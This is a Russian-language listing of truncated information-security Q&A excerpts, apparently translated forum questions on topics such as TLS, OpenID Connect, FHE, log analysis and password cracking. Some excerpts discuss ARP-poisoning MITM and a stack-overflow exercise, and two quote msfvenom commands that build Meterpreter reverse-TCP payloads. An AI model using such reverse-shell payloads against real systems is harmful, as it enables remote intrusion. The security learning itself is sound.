Вопросы и Ответы по Информационной Безопасности
Изучите вопросы и ответы по теме информационной безопасности, чтобы узнать, как защитить свои данные и системы от угроз и атак. Здесь вы найдете профессиональные советы, лучшие практики и актуальные тематические исследования, касающиеся кибербезопасности, а также обзоры современных технологий и инструментов для обеспечения безопасности.
Информационная безопасность
Вопрос или проблема Я пытаюсь создать более практическую атаку MITM с использованием DNS-спуфинга. Я использую традиционный метод отравления ARP с помощью dns_spoof. У меня нет никаких проблем с его работой. Запрашиваемый домен перенаправляется именно так, как и ожидалось.
Информационная безопасность
Вопрос или проблема Я пытаюсь решить задачу stack-five на exploit.education (http://exploit.education/phoenix/stack-five/). Я столкнулся с проблемой при эксплуатации переполнения стека. Задача заключается в вызове execve(‘
Информационная безопасность
Вопрос или проблема Я создаю небольшую веб-игру на three.js и хотел бы добавить функционал голосового чата. В настоящее время аудиоданные конвертируются в base64 на стороне клиента и затем отправляются на сервер, откуда они рассылаются всем остальным клиентам.
Информационная безопасность
Вопрос или проблема Предположим, я создал ключ развертывания с правами записи в репозиторий A. Предположим, репозиторий A имеет защищенную ветку master, для которой включена опция “Требовать запрос на вытягивание перед слиянием”
Информационная безопасность
Вопрос или проблема Мы хотим расшифровать трафик веб-сокетов, чтобы проанализировать используемый протокол. Трафик идет между ПК (Windows) и встроенной системой. Все сертификаты доступны с частными ключами, и всё настроено в лабораторной среде.
Информационная безопасность
Вопрос или проблема Я хотел бы узнать, существуют ли практические случаи использования Полносвязного Гомоморфного Шифрования (FHE) в организациях и, если да, то какие? Я понимаю, что FHE позволяет делегировать обработку данных, не предоставляя к ним доступ.
Информационная безопасность
Вопрос или проблема Колледж попросил меня установить клиент Sophos SSL VPN на мой личный ноутбук, чтобы подключаться к сети колледжа из дома (для выполнения таких задач, как регистрация на курсы и т. д.). Я уже установил клиент и несколько раз им пользовался.
Информационная безопасность
Вопрос или проблема Если у меня есть кластер, в котором все узлы используют один сертификат и закрытый ключ, считается ли это взаимным TLS? Технически обе стороны в связи имеют сертификат и представляют его друг другу. Взаимный TLS требует, чтобы обе
Информационная безопасность
Вопрос или проблема У меня есть микросервисная система с провайдером идентификации OpenId Connect, реализованная с помощью IdentityServer4. У меня есть одна специальная (очень общая) служба, которой необходимо взаимодействовать со всеми другими службами
Информационная безопасность
Вопрос или проблема Я использую freeradius для тестирования EAP-TLS. Авторизация проходит успешно только в том случае, если я указываю идентичность. Она даже не должна соответствовать каким-либо полям в клиентском сертификате.
Информационная безопасность
Вопрос или проблема После выхода из моего аккаунта Outlook я получаю многочисленные сообщения об ошибке “ошибка выхода”, с следующим сообщением: Хм… у нас возникают проблемы с выходом. Вы можете по-прежнему быть авторизованным в некоторых приложениях.
Информационная безопасность
Вопрос или проблема Я пытался сгенерировать полезную нагрузку с помощью msfvenom: msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.2.15 LPORT=1234 -f raw > shell.php У меня постоянно возникала эта ошибка: "ошибка: невозможно загрузить полезную нагрузку
Информационная безопасность
Вопрос или проблема Этот вопрос был перемещён из раздела Information Security Stack Exchange, потому что на него можно ответить в разделе Cryptography Stack Exchange. Перемещён 14 минут назад. Реализация ed25519 в supercop включает функцию под названием
Информационная безопасность
Вопрос или проблема Я ознакомился с несколькими обсуждениями здесь относительно управления оффлайн корневыми центрами сертификации (CA). Хотя они полезны, ни одно из них не совсем соответствует моему вопросу. Во-первых, это, предположительно, не будет оцениваться как ‘
Информационная безопасность
Вопрос или проблема Я разрабатываю приложение для ведения заметок, которое будет хранить заметки и файлы пользователей в зашифрованном виде в базе данных и на Backblaze соответственно. Приложение не будет иметь сквозного шифрования, но данные будут зашифрованы
Информационная безопасность
Вопрос или проблема Я работаю над системой аутентификации, которая использует пароли. Мне бы хотелось следовать современным рекомендациям NIST по поводу силы паролей. Тем не менее, мне также пришло в голову, что было бы неплохо хранить некоторые метаданные
Информационная безопасность
Вопрос или проблема Я тестирую John the Ripper (1.7.9 Jumbo 7) на файле, содержащем MD5-хэши без каких-либо имен пользователей. Я экспериментирую с различными правилами и конфигурациями – в данный момент я использую список слов и применяю команду --rules=single.
Информационная безопасность
Вопрос или проблема Я создаю полезную нагрузку на Python с помощью msfvenom, используя следующую команду: msfvenom -p python/meterpreter_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.173.137 LPORT=9090 -o stageless_payload.
Информационная безопасность
Вопрос или проблема Я довольно нов в анализе журналов Windows. Я наблюдаю чрезмерное количество входов с кодами 4624 и 4625 с именем субъекта/учетной записи: DomainController (фактическое имя контроллера домена отличается) к учетным записям пользователей.
Информационная безопасность
Вопрос или проблема У нас есть Java-приложение, которое позволяет пользователям загружать вложения и сохранять их на сервере. У приложения определена политика безопасности контента (CSP), которая выглядит следующим образом: base-uri 'self';